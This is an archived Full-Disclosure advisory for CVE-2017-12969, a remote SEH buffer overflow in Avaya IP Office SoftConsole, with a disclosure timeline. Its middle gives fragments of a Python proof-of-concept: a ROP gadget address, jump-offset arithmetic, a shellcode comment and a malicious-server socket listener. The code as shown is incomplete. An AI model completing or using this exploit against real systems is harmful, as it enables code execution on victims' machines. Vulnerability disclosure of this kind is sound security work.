lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 5 Nov 2017 01:17:25 -0400
From: hyp3rlinx <>
Subject: [FD] CVE-2017-12969 Avaya OfficeScan IPO Remote ActiveX Buffer

[+] Credits: John Page (aka hyp3rlinx)	
[+] Website:
[+] Source:
[+] ISR: apparitionSec


Avaya IP Office (IPO)
v9.1.0 - 10.1

IP Office is Avaya's global midsize solution for enterprises,
supporting up to 3,000 users at a single location with IP Office
Select editions.
For businesses with multiple locations, IP Office provides a powerful
set of tools to help streamline operations, centralize management, and
reduce total cost of ownership for converged networks. Using industry
standards, IP Office enables companies to share resources, provide
improved customer service, and keep mobile employees accessible.

Provides a hybrid PBX with TDM and IP telephony and trunk support.
Provides IP routing, switching and firewall protection, between LAN
and WAN (LAN2).

In addition to basic telephony services and voicemail, IP Office
offers both hard phone and soft phone options.
Includes a robust set of tools for administration (Manager), call
tracking (SMDR), and system monitoring and diagnostics (System Status

Available editions: Basic, Essential, Preferred, Server, Server
Select, Server with Virtualized Software, Server/Sever Select hosted
in the Cloud.

Vulnerability Type:
Remote Buffer Overflow

CVE Reference:

Security Issue:
SoftConsole.exe does not check bounds when reading server response on
making an outbound connection, resulting in a classic
Buffer Overflow exploit.

Avaya IP Office user must connect to a malicious server where a remote
attacker can then deliver the buffer overflow
payload in the server response, exploiting the SoftConsole client.
This vulnerability allows attackers to deliver and
execute arbitrary attacker supplied code on the Avaya host system.


POC Video URL:


import struct,socket
#Log data, item 8
# Address=50E083A1
# Message=  0x50e083a1 : pop ecx # pop ebp # ret 0x04 |
{PAGE_EXECUTE_READ} [IndyCore190.bpl]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v19.0.14356.6604
#(C:\Program Files (x86)\Avaya\IP Office\SoftConsole\IndyCore190.bpl)

No SafeSEH



#shellcode to call wusa.exe Windows Update Standalone Installer (Tested Win 7)


calculated by taking the negative of the number and convert to hex:
in gdb
p/x -1116
$4 = 0xfffffba4
So now we know that our near jump is going to be \xe9\xa4\xfb\xff\xff.

seh=struct.pack("<L", 0x50E149FD) #POP ECX POP EBP RET
#payload="A"*564+"BBBBRRRR"+"A"*232  #control SEH here

#(gdb) p/x -112
#$1 = 0xffffff90


s = socket.socket()
host = ''
s.bind((HOST, PORT))

print 'Avaya IP Office SoftConsole 9.1.0'
print '0day Remote Buffer Overflow Exploit'
print 'Discovery / exploit: hyp3rlinx\n'
print 'Listening on port 80 for Avaya client connectionz...'

while True:
    conn, addr = s.accept()
    print 'KABOOM!!!'

Network Access:


Disclosure Timeline:
Vendor Notification: July 7, 2017
Vendor reply "under investigation" : July 7, 2017
Vendor acknowledgement of issue : July 12, 2017
CVE assigned by mitre: July 13, 2017
Vendor advisory: November 4, 2017
November 5, 2017  : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).


Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists